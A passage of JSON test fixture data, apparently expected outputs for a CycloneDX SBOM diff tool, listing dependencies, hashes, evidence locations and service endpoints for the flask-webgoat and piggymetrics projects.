"pkg:pypi/jinja2@2.11.3"}, {"dependsOn": [], "ref": "pkg:pypi/markupsafe@1.1.1"}, {"dependsOn": [], "ref": "pkg:pypi/itsdangerous@1.1.0"}, {"dependsOn": [], "ref": "pkg:pypi/click@7.1.2"}, {"dependsOn": ["pkg:pypi/click@7.1.2", "pkg:pypi/itsdangerous@1.1.0", "pkg:pypi/jinja2@2.11.3", "pkg:pypi/werkzeug@1.0.1"], "ref": "pkg:pypi/flask@1.1.2"}], "metadata": {"authors": [{"name": "OWASP Foundation"}], "component": {"bom-ref": 
"pkg:gem/flask-webgoat@latest", "name": "flask-webgoat", "purl": "pkg:gem/flask-webgoat@latest", "type": "application", "version": "latest"}, "lifecycles": [{"phase": "build"}], "tools": {"components": [{"author": "OWASP Foundation", "bom-ref": "pkg:npm/@cyclonedx/cdxgen@10.2.1", "group": "@cyclonedx", "name": "cdxgen", "publisher": "OWASP Foundation", "purl": "pkg:npm/%40cyclonedx/cdxgen@10.2.1", "type": "application", "version": "10.2.1"}]}}, "services": [{"authenticated": false, "endpoints": ["/grep_processes", "/message"], "name": "actions-service"}, {"authenticated": false, "endpoints": ["/login", "/login_and_redirect"], "name": "auth-service"}, {"authenticated": false, "endpoints": ["/ping", "/status"], "name": "status-service"}, {"authenticated": false, "endpoints": ["/search"], "name": "ui-service"}, {"authenticated": false, "endpoints": ["/create_user"], "name": "users-service"}], "specVersion": "1.5", "version": 2}, "result_11": {"components": [{"version": "1.0.1"}, {"version": "2.11.3"}, {"bom-ref": "pkg:pypi/markupsafe@1.1.1", "name": "MarkupSafe", "purl": "pkg:pypi/markupsafe@1.1.1", "version": "1.1.1"}, {"bom-ref": "pkg:pypi/itsdangerous@1.1.0", "name": "itsdangerous", "purl": "pkg:pypi/itsdangerous@1.1.0", "version": "1.1.0"}, {"bom-ref": "pkg:pypi/click@7.1.2", "name": "click", "purl": "pkg:pypi/click@7.1.2", "version": "7.1.2"}], "dependencies": [{"ref": "pkg:pypi/itsdangerous@1.1.0"}, {"ref": "pkg:pypi/click@7.1.2"}, {"dependsOn": ["pkg:pypi/click@7.1.2", "pkg:pypi/itsdangerous@1.1.0", "pkg:pypi/jinja2@2.11.3", "pkg:pypi/werkzeug@1.0.1"], "ref": "pkg:pypi/flask@1.1.2"}], "services": [{"endpoints": ["/create_user"], "name": "users-service"}]}, "result_12": {"bomFormat": "CycloneDX", "components": [{"bom-ref": "pkg:pypi/flask@1.1.2", "evidence": {"identity": {"confidence": 1, "field": "purl", "methods": [{"confidence": 1, "technique": "instrumentation", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\venv"}]}, "occurrences": [{"location": 
"flask_webgoat\\__init__.py#20"}, {"location": "flask_webgoat\\actions.py#13"}, {"location": "flask_webgoat\\actions.py#16"}, {"location": "flask_webgoat\\actions.py#19"}, {"location": "flask_webgoat\\actions.py#22"}, {"location": "flask_webgoat\\actions.py#34"}, {"location": "flask_webgoat\\actions.py#4"}, {"location": "flask_webgoat\\actions.py#46"}, {"location": "flask_webgoat\\actions.py#49"}, {"location": "flask_webgoat\\actions.py#6"}, {"location": "flask_webgoat\\actions.py#7"}, {"location": "flask_webgoat\\auth.py#13"}, {"location": "flask_webgoat\\auth.py#23"}, {"location": "flask_webgoat\\auth.py#25"}, {"location": "flask_webgoat\\auth.py#35"}, {"location": "flask_webgoat\\auth.py#4"}, {"location": "flask_webgoat\\auth.py#44"}, {"location": "flask_webgoat\\auth.py#46"}, {"location": "flask_webgoat\\status.py#13"}, {"location": "flask_webgoat\\status.py#3"}, {"location": "flask_webgoat\\status.py#8"}, {"location": "flask_webgoat\\ui.py#14"}, {"location": "flask_webgoat\\ui.py#19"}, {"location": "flask_webgoat\\ui.py#24"}, {"location": "flask_webgoat\\ui.py#6"}, {"location": "flask_webgoat\\users.py#14"}, {"location": "flask_webgoat\\users.py#18"}, {"location": "flask_webgoat\\users.py#24"}, {"location": "flask_webgoat\\users.py#3"}, {"location": "flask_webgoat\\users.py#33"}, {"location": "flask_webgoat\\users.py#44"}, {"location": "flask_webgoat\\users.py#46"}, {"location": "flask_webgoat\\users.py#7"}]}, "name": "flask", "properties": [{"name": "ImportedModules", "value": "flask.redirect,flask.render_template,flask.jsonify,flask.Blueprint,flask.session,flask.g,flask.request,flask.Flask"}], "purl": "pkg:pypi/flask@1.1.2", "type": "framework", "version": "1.1.2"}, {"bom-ref": "pkg:pypi/werkzeug@1.0.1", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "name": "Werkzeug", "properties": [{"name": 
"SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "purl": "pkg:pypi/werkzeug@1.0.1", "type": "library"}, {"bom-ref": "pkg:pypi/jinja2@2.11.3", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "name": "Jinja2", "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "purl": "pkg:pypi/jinja2@2.11.3", "type": "library"}, {"evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "type": "library"}, {"evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "type": "library"}, {"evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "type": "library"}, {"bom-ref": "pkg:github/actions/checkout@v2", "group": "actions", "name": "checkout", "purl": "pkg:github/actions/checkout@v2", "type": "application", "version": "v2"}, {"bom-ref": "pkg:github/actions/setup-python@v2", "group": "actions", "name": "setup-python", "purl": "pkg:github/actions/setup-python@v2", "type": "application", "version": "v2"}], "dependencies": 
[{"dependsOn": ["pkg:pypi/flask@1.1.2"], "ref": "pkg:pypi/flask-webgoat@latest"}, {"dependsOn": [], "ref": "pkg:pypi/werkzeug@1.0.1"}, {"dependsOn": ["pkg:pypi/markupsafe@1.1.1"], "ref": "pkg:pypi/jinja2@2.11.3"}, {"dependsOn": [], "ref": "pkg:pypi/markupsafe@1.1.1"}, {"dependsOn": []}, {"dependsOn": []}], "metadata": {"authors": [{"name": "OWASP Foundation"}], "component": {"bom-ref": "pkg:gem/flask-webgoat@latest", "name": "flask-webgoat", "purl": "pkg:gem/flask-webgoat@latest", "type": "application", "version": "latest"}, "lifecycles": [{"phase": "build"}], "tools": {"components": [{"author": "OWASP Foundation", "bom-ref": "pkg:npm/@cyclonedx/cdxgen@10.2.1", "group": "@cyclonedx", "name": "cdxgen", "publisher": "OWASP Foundation", "purl": "pkg:npm/%40cyclonedx/cdxgen@10.2.1", "type": "application", "version": "10.2.1"}]}}, "services": [{"authenticated": false, "endpoints": ["/grep_processes", "/message"], "name": "actions-service"}, {"authenticated": false, "endpoints": ["/login", "/login_and_redirect"], "name": "auth-service"}, {"authenticated": false, "endpoints": ["/ping", "/status"], "name": "status-service"}, {"authenticated": false, "endpoints": ["/search"], "name": "ui-service"}, {"authenticated": false}], "specVersion": "1.5", "version": 2}, "result_2": {"diff_summary": {"bom_1.json": {"components": {"libraries": [{"bom-ref": "pkg:maven/joda-time/joda-time@2.9.9?type=jar", "type": "library", "description": "Date and time library to replace JDK date handling", "group": "joda-time", "name": "joda-time", "publisher": "Joda.org", "purl": "pkg:maven/joda-time/joda-time@2.9.9?type=jar", "scope": "required", "version": "2.9.9"}]}}, "bom_2.json": {"components": {"libraries": [{"bom-ref": "pkg:maven/joda-time/joda-time@2.8.9?type=jar", "type": "library", "description": "Date and time library to replace JDK date handling", "group": "joda-time", "name": "joda-time", "publisher": "Joda.org", "purl": "pkg:maven/joda-time/joda-time@2.8.9?type=jar", "scope": 
"required", "version": "2.8.9"}]}}}, "common_summary": {"components": {"frameworks": [{"bom-ref": "pkg:maven/org.springframework.cloud/spring-cloud-starter-config@2.0.0.RELEASE?type=jar", "type": "framework", "description": "Spring Cloud Starter", "group": "org.springframework.cloud", "name": "spring-cloud-starter-config", "publisher": "Pivotal Software, Inc.", "purl": "pkg:maven/org.springframework.cloud/spring-cloud-starter-config@2.0.0.RELEASE?type=jar", "scope": "required", "version": "2.0.0.RELEASE"}]}}}, "result_3": {"diff_summary": {"bom_1.json": {"components": {"applications": [{"bom-ref": "pkg:github/actions/setup-python@v2", "type": "application", "group": "actions", "name": "setup-python", "purl": "pkg:github/actions/setup-python@v2", "version": "v2"}], "frameworks": [{"bom-ref": "pkg:pypi/flask@1.1.2", "type": "framework", "name": "flask", "purl": "pkg:pypi/flask@1.1.2", "version": "1.1.2"}]}}, "bom_2.json": {"components": {"applications": [{"bom-ref": "pkg:github/actions/setup-python@v2", "type": "application", "name": "setup-python", "purl": "pkg:github/actions/setup-python@v2", "version": "v2"}], "frameworks": [{"bom-ref": "pkg:pypi/flask@1.1.0", "type": "framework", "name": "flask", "purl": "pkg:pypi/flask@1.1.0", "version": "1.1.0"}]}}}, "common_summary": {"components": {"libraries": [{"bom-ref": "pkg:pypi/werkzeug@1.0.1", "type": "library", "name": "Werkzeug", "purl": "pkg:pypi/werkzeug@1.0.1", "version": "1.0.1"}], "applications": [{"bom-ref": "pkg:github/actions/checkout@v2", "type": "application", "name": "checkout", "purl": "pkg:github/actions/checkout@v2", "version": "v2"}]}}}, "result_4": {"common_summary": {"components": {"libraries": [{"bom-ref": "pkg:maven/com.fasterxml.jackson.core/jackson-core@2.9.6?type=jar", "type": "library", "description": "Core Jackson processing abstractions (aka Streaming API), implementation for JSON", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": 
"binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\com\\fasterxml\\jackson\\core\\jackson-core\\2.9.6\\jackson-core-2.9.6.jar"}]}}, "group": "com.fasterxml.jackson.core", "hashes": [{"alg": "SHA3-256", "content": "243fdbf974b456d3d96ac5c0d018c3ff2ba6f8dedeea5510da8eb851f2026efb"}, {"alg": "SHA-1", "content": "4e393793c37c77e042ccc7be5a914ae39251b365"}, {"alg": "SHA-384", "content": "59f87a260de53f8ddabe35749cd8abc71e52ebfeacd51b1e68363fe4bf72e632a7ea3648340969e8fdb0eb90d994fff4"}, {"alg": "SHA3-384", "content": "626fc0c5049dde3d55e7b47a935e735bd0dd4aed80d22ba5ec708d581c710702a4a2f4963a1d7870692a77e05d67fd75"}, {"alg": "SHA3-512", "content": "6944f9effea908ae8564a7a1a951a9c7b6e27e7cc978eac30fb43ddef0870103f669065d4b0df7293d5d541f9bf9e04b0cebbf26fdf0159d1dffb6fa465bc64f"}, {"alg": "SHA-512", "content": "a1b9b68b67d442a47e36b46b37b6b0ad7a10c547a1cf7adb4705baec77356e1080049d310b3b530f66bbd3c0ed05cfe43c041d6ef4ffbbc6731149624df4e699"}, {"alg": "MD5", "content": "f3cf83b839fac92307cad542c2ded5c4"}, {"alg": "SHA-256", "content": "fab8746aedd6427788ee390ea04d438ec141bff7eb3476f8bdd5d9110fb2718a"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "jackson-core", "publisher": "FasterXML", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-core@2.9.6?type=jar", "scope": "required", "version": "2.9.6"}, {"bom-ref": "pkg:maven/org.aspectj/aspectjweaver@1.8.13?type=jar", "type": "library", "description": "The AspectJ weaver introduces advices to java classes", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\aspectj\\aspectjweaver\\1.8.13\\aspectjweaver-1.8.13.jar"}]}}, "group": "org.aspectj", "hashes": [{"alg": "MD5", "content": "4a95811a5b41a038a359c05189de9829"}, {"alg": "SHA3-384", "content": 
"71b931c9517a44ec80139384581067a8d2ebb642d9bae8ce2ad785e6479a1e380ab9d5d5720582bd7d9e2d33c7322571"}, {"alg": "SHA3-256", "content": "8fc704392325ca3d4597055a9e7780b7e2ada5bf63ca1d60a9bbfbc2c6d8f1df"}, {"alg": "SHA-256", "content": "965d0928b0e07dcedb67f0d0a48653d36a6cff257e3270cb28ea48fef6c30a27"}, {"alg": "SHA-384", "content": "a7aa2b3cbd2abc4264f69e97e70e202c24d8fa2c67376cd1c16731fecee57b518cd41c45c0288e036100c6a7c53750ec"}, {"alg": "SHA-1", "content": "ad94df2a28d658a40dc27bbaff6a1ce5fbf04e9b"}, {"alg": "SHA-512", "content": "be2b21636f7e6786c9c3c50684e522520d6bc0580ce49ff8a9c0fbe422568acbb91fd70dde63a3624098ba10d4e3892f2de0ffaa05f595278d2726b44e6aa576"}, {"alg": "SHA3-512", "content": "e5d1354f72fcaf1018ff248554491077e8037c116ee6f66d98f49f290f17417bb0d73f18775f00717978755ea44533c95d13011217531d065ac3f15b9c582d7a"}], "licenses": [{"license": {"id": "EPL-1.0"}}], "name": "aspectjweaver", "purl": "pkg:maven/org.aspectj/aspectjweaver@1.8.13?type=jar", "scope": "required", "version": "1.8.13"}], "frameworks": [{"bom-ref": "pkg:maven/org.bouncycastle/bcpkix-jdk15on@1.56?type=jar", "type": "framework", "description": "The Bouncy Castle Java APIs for CMS, PKCS, EAC, TSP, CMP, CRMF, OCSP, and certificate generation. This jar contains APIs for JDK 1.5 to JDK 1.8. 
The APIs can be used in conjunction with a JCE/JCA provider such as the one provided with the Bouncy Castle Cryptography APIs.", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\bouncycastle\\bcpkix-jdk15on\\1.56\\bcpkix-jdk15on-1.56.jar"}]}}, "group": "org.bouncycastle", "hashes": [{"alg": "MD5", "content": "17b2b704b3ad9b36a6fca1ace60a2a06"}, {"alg": "SHA-1", "content": "4648af70268b6fdb24674fb1fd7c1fcc73db1231"}, {"alg": "SHA-512", "content": "6cbc73005b662440c395d81d44d0f52a3e20550f64be3d4fe413c344257c6ef31f8080421b247273f8be42e724de370b1f1b2f0dae58a47010ef4c890d8cf5b8"}, {"alg": "SHA-256", "content": "7043dee4e9e7175e93e0b36f45b1ec1ecb893c5f755667e8b916eb8dd201c6ca"}, {"alg": "SHA-384", "content": "8147d3692b03ac84ccdd20f8ff7f3d319583434ad1a0178ab31d6433a3ed11c6e05967b26bbaf0420f400a32fb5941c5"}, {"alg": "SHA3-384", "content": "899934416d5f5c3cfe0377b41d1403730c760b6d9edec6079e73a70ec8b92616055c37fb1fee3b227a6dae360cd9cc65"}, {"alg": "SHA3-512", "content": "a6f07a263da0a69665d916d9b41f42d74061630c5ff83e8c407fa3b9aa47708c23a0a3c3c2b9f953af66b60374556c8e89eed2bb7ff3176fc4f603f957f0fffa"}, {"alg": "SHA3-256", "content": "e57c428533d3222b66f93c6bd530ee3bd0e4584c32d5ad50424072f6e8de2d98"}], "licenses": [{"license": {"name": "Bouncy Castle Licence", "url": "http://www.bouncycastle.org/licence.html"}}], "name": "bcpkix-jdk15on", "purl": "pkg:maven/org.bouncycastle/bcpkix-jdk15on@1.56?type=jar", "scope": "required", "version": "1.56"}, {"bom-ref": "pkg:maven/org.springframework.cloud/spring-cloud-context@2.0.0.RELEASE?type=jar", "type": "framework", "description": "Spring Cloud Context", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": 
"C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\springframework\\cloud\\spring-cloud-context\\2.0.0.RELEASE\\spring-cloud-context-2.0.0.RELEASE.jar"}]}, "occurrences": [{"location": "notification-service\\src\\main\\java\\com\\piggymetrics\\notification\\service\\EmailServiceImpl.java#22"}]}, "group": "org.springframework.cloud", "hashes": [{"alg": "SHA3-256", "content": "2074e427d7cda1199ef40962370de1dd1b3163c33ce9254a9e0b38a7667dc4bf"}, {"alg": "SHA3-512", "content": "2f05d0c7c31bbac1336e5f37fdcdcdc7bf022a369faaa5c59a2733c8174022a7848492c8faad3fb483c7dce78210cc67465ce68b766b8155652d58d6f206149c"}, {"alg": "SHA-1", "content": "3f0d28344c0dc74eb8594f3f3dd6f82c687be198"}, {"alg": "SHA3-384", "content": "96c8275ce24cc07a8d9311075e667c44a1d9f032993e58be7f9632951a91744b96b118e5db3b0a9882f8d145a7e40f13"}, {"alg": "SHA-384", "content": "96ff50360c1b03d6e225c5975405ce714464cacbbd77896c7841bbf47a14660970b13d2d11d7af1c7396ec4b0e9238e9"}, {"alg": "SHA-256", "content": "abb111a850530a2d9174939f9ef6424efa4abecf978e5625915aa84ea17bb9fe"}, {"alg": "SHA-512", "content": "c5bcf7518bb6bafc311af1e14db61f5fdcdb56e24658da1481e8806e5ad7c897e4def752b9af7d9df1e6cd998300f4f0881593e4b961827c33777c7cbcb6fb44"}, {"alg": "MD5", "content": "e7a4e7275f373c6167b7590591c19efd"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "spring-cloud-context", "publisher": "Pivotal Software, Inc.", "purl": "pkg:maven/org.springframework.cloud/spring-cloud-context@2.0.0.RELEASE?type=jar", "scope": "required", "version": "2.0.0.RELEASE"}, {"bom-ref": "pkg:maven/org.springframework.cloud/spring-cloud-starter-config@2.0.0.RELEASE?type=jar", "type": "framework", "description": "Spring Cloud Starter", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": 
"C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\springframework\\cloud\\spring-cloud-starter-config\\2.0.0.RELEASE\\spring-cloud-starter-config-2.0.0.RELEASE.jar"}]}}, "group": "org.springframework.cloud", "hashes": [{"alg": "SHA-512", "content": "323078a561ef0cd2ab514801fe8604a3c16b2ae43c1bf92ad32d0abec780e0f9b557a781da1d6a9c56a225e77ef9cca3987246b3f43fbb7a5e2998caab392b8f"}, {"alg": "SHA-1", "content": "42f8c6a92ef1a09239e38a1cf65293ffde1b181c"}, {"alg": "SHA-256", "content": "5342438a378e975b8ecd228eb33f527a96267ab75bd4e5c8a0bbdc729a9f95a9"}, {"alg": "MD5", "content": "5d514c991ae9344ed41c50b6cce19bdc"}, {"alg": "SHA3-512", "content": "6736c58d38d47072eb084233062b0ea96b3b0ff66a4c4e8a4c2f3349d07a7091933abf05fda7a7660474520f7bb75c66d2c98fa9c488f98fe452d5dac132483a"}, {"alg": "SHA3-256", "content": "77acab1bc1c472b4f2d3dbadab3d278c827a967db51a6ca6d2046e1b6fc469f7"}, {"alg": "SHA-384", "content": "d1c7ef45846e4bf3e0b69131d80102d5be8e9413d40a00aebecb4461ef59b06cd52c05ae68777592a9689713b92f64b7"}, {"alg": "SHA3-384", "content": "eb6590405d9ff1dcf6b729bb561230598adf7893d61c1a46c5ae6f65974e3a3550b2b480628b656ea765be6fba9a8102"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "spring-cloud-starter-config", "publisher": "Pivotal Software, Inc.", "purl": "pkg:maven/org.springframework.cloud/spring-cloud-starter-config@2.0.0.RELEASE?type=jar", "scope": "required", "version": "2.0.0.RELEASE"}, {"bom-ref": "pkg:maven/org.springframework.cloud/spring-cloud-starter@2.0.0.RELEASE?type=jar", "type": "framework", "description": "Spring Cloud Starter", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\springframework\\cloud\\spring-cloud-starter\\2.0.0.RELEASE\\spring-cloud-starter-2.0.0.RELEASE.jar"}]}}, "group": "org.springframework.cloud", "hashes": [{"alg": "SHA-1", "content": 
"0247ea27d9483e9806f539f6031af135a6a3645f"}, {"alg": "MD5", "content": "4d031dc9879546e189c6c914c19c0542"}, {"alg": "SHA3-512", "content": "5dc4e0e8e5f8e8154aeb362d6018a6d6d3507f4b3d60a3cf51d9ae80e17a9b5a300ff26ac1b508e1ab13c569ae572e94c443e4ca1c92edd48771a7fe5287b1bd"}, {"alg": "SHA-256", "content": "670eedd14018f52145cd58de663739657a19e0e1a7ad965cf7e0a99dd37e84e4"}, {"alg": "SHA-512", "content": "8187b1a499b98e9a2e44bdfa3bca5088ee8034bce371c014b5fd4b1c2240f3447562ba74987b3d91552d45e6c2349942342133ab6bc8e2ba4330257ad63b2f3b"}, {"alg": "SHA-384", "content": "a42de307261711df91fd860690834edf0c28144e820ed8c513c3ec606ffc7728d3ff0496272b55944fbcce4ba7c79675"}, {"alg": "SHA3-256", "content": "d43f97976acafc9bcb47ccece04ef74ab61a6faddfea7ff5cae7c3c1acaedce5"}, {"alg": "SHA3-384", "content": "dba2c320469b2d423fae76fc68a0b57f4d5f7da17f2c7b44c41b7654bbb8395b7e669c538384728e2e65824e8864b501"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "spring-cloud-starter", "publisher": "Pivotal Software, Inc.", "purl": "pkg:maven/org.springframework.cloud/spring-cloud-starter@2.0.0.RELEASE?type=jar", "scope": "required", "version": "2.0.0.RELEASE"}, {"bom-ref": "pkg:maven/org.springframework.security/spring-security-rsa@1.0.5.RELEASE?type=jar", "type": "framework", "description": "Spring Security RSA is a small utility library for RSA ciphers. 
It belongs to the family of Spring Security crypto libraries that handle encoding and decoding text as a general, useful thing to be able to do.", "evidence": {"callstack": {"frames": [{"fullFilename": "auth-service\\src\\main\\java\\com\\piggymetrics\\auth\\config\\WebSecurityConfig.java", "function": "authenticationManagerBean", "line": 38, "module": "com.piggymetrics.auth.config.WebSecurityConfig", "package": "com.piggymetrics.auth.config"}, {"column": 16, "fullFilename": "auth-service\\src\\main\\java\\com\\piggymetrics\\auth\\config\\WebSecurityConfig.java", "function": "authenticationManagerBean", "line": 41, "module": "com.piggymetrics.auth.config.WebSecurityConfig", "package": "com.piggymetrics.auth.config"}, {"column": 16, "fullFilename": "auth-service\\src\\main\\java\\com\\piggymetrics\\auth\\config\\WebSecurityConfig.java", "function": "authenticationManagerBean", "line": 41, "module": "com.piggymetrics.auth.config.WebSecurityConfig", "package": "com.piggymetrics.auth.config"}, {"column": 9, "fullFilename": "auth-service\\src\\main\\java\\com\\piggymetrics\\auth\\config\\WebSecurityConfig.java", "function": "authenticationManagerBean", "line": 41, "module": "com.piggymetrics.auth.config.WebSecurityConfig", "package": "com.piggymetrics.auth.config"}]}, "identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\springframework\\security\\spring-security-rsa\\1.0.5.RELEASE\\spring-security-rsa-1.0.5.RELEASE.jar"}]}}, "group": "org.springframework.security", "hashes": [{"alg": "SHA-1", "content": "31bd1111ada2f455eb0f492ed09e39deda18ca99"}, {"alg": "SHA3-512", "content": "60338f31c9984f232abb52affe0025bb4f8380a71b754d8f5f686360339985d6015f995299d73a8cf4a9eac743cfc9cc141b9de0c672d4743b2740539b497e0a"}, {"alg": "SHA-384", "content": "74af3ef26d098d1c4954e5c4d8cf19391ea1788eaa06cf4d4176d7fd7008d7b34ef594e384c480966cf3e6fd1a57df9e"}, 
{"alg": "MD5", "content": "88d25c857040132ad991af650dcb5e9e"}, {"alg": "SHA-512", "content": "9613e84294a7d0486d6f9529a614526b1b9e37c17c7a1f8c59baa418fe04eb5f09163ef31a7e29b59673bb899bfeaa1d9b99daf91a70dec0a3f761e12da7c284"}, {"alg": "SHA3-384", "content": "ae5b96fd3c5ef3c12bfc91cd6b74fea4d0371ebeed79ff8de1c219b6689ed878c3dde01fb90c34a0163681d234e7a9d2"}, {"alg": "SHA3-256", "content": "cfb4a0c1fee534a26992a7f7adf569b07b5e1190338adf77639afd384c20f2d3"}, {"alg": "SHA-256", "content": "db764286a058f85ac06df00c254afd8d63c618db5abc962a6bdb5f440cb2e5d6"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "spring-security-rsa", "publisher": "SpringSource", "purl": "pkg:maven/org.springframework.security/spring-security-rsa@1.0.5.RELEASE?type=jar", "scope": "required", "version": "1.0.5.RELEASE"}]}, "dependencies": [{"ref": "pkg:maven/com.piggymetrics/turbine-stream-service@0.0.1-SNAPSHOT?type=jar", "dependsOn": ["pkg:maven/org.springframework.boot/spring-boot-starter-test@2.0.3.RELEASE?type=jar", "pkg:maven/org.springframework.cloud/spring-cloud-starter-config@2.0.0.RELEASE?type=jar", "pkg:maven/org.springframework.cloud/spring-cloud-starter-netflix-eureka-client@2.0.0.RELEASE?type=jar", "pkg:maven/org.springframework.cloud/spring-cloud-starter-netflix-turbine-stream@2.0.0.RELEASE?type=jar", "pkg:maven/org.springframework.cloud/spring-cloud-starter-stream-rabbit@2.0.0.RELEASE?type=jar"]}, {"ref": "pkg:maven/org.springframework.boot/spring-boot-starter@2.0.3.RELEASE?type=jar", "dependsOn": ["pkg:maven/javax.annotation/javax.annotation-api@1.3.2?type=jar", "pkg:maven/org.springframework.boot/spring-boot-autoconfigure@2.0.3.RELEASE?type=jar", "pkg:maven/org.springframework.boot/spring-boot-starter-logging@2.0.3.RELEASE?type=jar", "pkg:maven/org.springframework.boot/spring-boot@2.0.3.RELEASE?type=jar", "pkg:maven/org.springframework/spring-core@5.0.7.RELEASE?type=jar", "pkg:maven/org.yaml/snakeyaml@1.19?type=jar"]}, {"ref": 
"pkg:maven/org.springframework.cloud/spring-cloud-starter-config@2.0.0.RELEASE?type=jar", "dependsOn": ["pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.6?type=jar", "pkg:maven/org.springframework.cloud/spring-cloud-config-client@2.0.0.RELEASE?type=jar", "pkg:maven/org.springframework.cloud/spring-cloud-starter@2.0.0.RELEASE?type=jar"]}, {"ref": "pkg:maven/org.springframework.cloud/spring-cloud-starter@2.0.0.RELEASE?type=jar", "dependsOn": ["pkg:maven/org.springframework.boot/spring-boot-starter@2.0.3.RELEASE?type=jar", "pkg:maven/org.springframework.cloud/spring-cloud-commons@2.0.0.RELEASE?type=jar", "pkg:maven/org.springframework.cloud/spring-cloud-context@2.0.0.RELEASE?type=jar", "pkg:maven/org.springframework.security/spring-security-rsa@1.0.5.RELEASE?type=jar"]}], "services": [{"name": "com-piggymetrics-account-client-AuthServiceClient-createUser-service", "endpoints": ["/uaa/users"], "authenticated": true, "x-trust-boundary": true}, {"name": "com-piggymetrics-account-client-StatisticsServiceClient-updateStatistics-service", "endpoints": ["/statistics/{accountName}"]}, {"name": "com-piggymetrics-account-controller-AccountController-createNewAccount-service", "endpoints": ["/"]}, {"name": "com-piggymetrics-statistics-controller-StatisticsController-getCurrentAccountStatistics-service", "endpoints": ["/current"]}, {"name": "com-piggymetrics-statistics-controller-StatisticsController-getStatisticsByAccountName-service", "endpoints": ["/{accountName}"], "authenticated": true, "x-trust-boundary": true}, {"name": "com-piggymetrics-statistics-controller-StatisticsController-saveAccountStatistics-service", "endpoints": ["/{accountName}"], "authenticated": true, "x-trust-boundary": true}], "bomFormat": "CycloneDX", "metadata": {"authors": [{"name": "OWASP Foundation"}], "component": {"bom-ref": "pkg:maven/com.piggymetrics/turbine-stream-service@0.0.1-SNAPSHOT?type=jar", "description": "Turbine Stream Service", "externalReferences": [{"type": "vcs", "url": 
"https://github.com/spring-projects/spring-boot/spring-boot-starter-parent/piggymetrics/turbine-stream-service"}, {"type": "website", "url": "https://projects.spring.io/spring-boot/#/spring-boot-starter-parent/piggymetrics/turbine-stream-service"}], "group": "com.piggymetrics", "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "turbine-stream-service", "purl": "pkg:maven/com.piggymetrics/turbine-stream-service@0.0.1-SNAPSHOT?type=jar", "type": "library", "version": "0.0.1-SNAPSHOT"}, "tools": {"components": [{"author": "OWASP Foundation", "group": "@cyclonedx", "name": "cdxgen", "publisher": "OWASP Foundation", "type": "application"}]}}, "specVersion": "1.5", "version": 3}, "diff_summary": {"test/sbom-java.json": {"components": {"frameworks": [{"bom-ref": "pkg:maven/antlr/antlr@2.7.7?type=jar", "type": "framework", "description": "A framework for constructing recognizers, compilers, and translators from grammatical descriptions containing Java, C#, C++, or Python actions.", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\antlr\\antlr\\2.7.7\\antlr-2.7.7.jar"}]}}, "group": "antlr", "hashes": [{"alg": "SHA-384", "content": "2e811e531ce30a2a905d093a00de596cf04406413b60422db8252b46125cadf07b71459cf6ac6da575ec030a9bf05e57"}, {"alg": "SHA-512", "content": 